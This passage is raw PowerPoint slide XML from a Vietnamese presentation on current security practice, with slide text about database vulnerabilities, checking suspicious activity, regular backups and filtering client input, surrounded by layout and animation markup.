                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11422613" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11422613" y="8328124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="832812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1" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{252C8B3E-7EA8-C366-6BB6-8DA5C54730DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB3D5EE4-23FD-E3A2-1910-0720F5AF7455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742951" y="2698265"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD8BBF3D-04E5-B6A3-3E14-AA47E7BC4BF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30DBEA8F-74ED-0927-D140-75867E125AE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="246016"/>
              <a:ext cx="1806232" cy="269547"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="3200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>2 Các lỗ hổng từ nhiều nguyên nhân khác nhau</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7741500C-4F4C-D8D2-344E-87913951715B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3463694"/>
            <a:ext cx="12344400" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ầu hết các hệ thống cơ sở dữ liệu thông thường đều có rò rỉ mà kẻ tấn công có thể sử dụng để xâm nhập cơ sở dữ liệu.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" kern="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Vì </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>các hoạt động độc hại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> đối với hệ thống”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> không nhất thiết phải từ kẻ tấn công, kỹ sư bảo mật cần thời gian để </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>kiểm tra và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xem hoạt động có thực sự nguy hiểm hay không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nên chúng ta cần thường xuyên xây dựng các bản backup để tránh thiệt hại cho hệ thống và dữ liệu của người dung.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B317B3-D3E2-1F8C-014C-EF452858CE24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14951441" y="2083393"/>
            <a:ext cx="2699395" cy="2760602"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D577389-B2F2-14DD-424D-D048CD66889A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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4"/>
              <a:stretch>
                <a:fillRect l="-61585" r="-48170"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1649847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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>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39"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="22" presetClass="entr" presetSubtype="4" fill="hold" nodeType="with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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="1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1" grpId="0"/>
      <p:bldP spid="3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5699680" y="-1470403"/>
            <a:ext cx="14026196" cy="11628992"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14026196" h="11628992">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14026196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14026196" y="11628992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116289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2" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D81EE01-3628-108E-B7EB-A7CD34BEC10C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760920" y="876300"/>
            <a:ext cx="15544799" cy="1647887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" u="none" spc="-84">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>II. Tìm hiểu về thực trạng và các công việc liên quan đến bảo mật hiện nay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31683666-1CE6-80A3-054B-B739FEA0DE55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742950" y="2698266"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE13FF83-1033-2D57-6FC2-2580D1123120}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="40798" y="71151"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
                    <a:pt x="27795" y="2158016"/>
                    <a:pt x="16945" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6095" y="2136317"/>
                    <a:pt x="0" y="2121601"/>
                    <a:pt x="0" y="2106257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="57855"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="42511"/>
                    <a:pt x="6095" y="27795"/>
                    <a:pt x="16945" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27795" y="6095"/>
                    <a:pt x="42511" y="0"/>
                    <a:pt x="57855" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E451662-70A3-D440-613B-18E8937A283A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="1554027" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0063E101-B661-1C28-E938-C4D4FC6BDBE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1453558" y="3439524"/>
            <a:ext cx="7315200" cy="4743478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="26035" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Mỗi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mục dữ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>liệu gửi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>từ máy khách đến máy chủ đều được </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>kiểm tra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>lọc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3200" dirty="0">
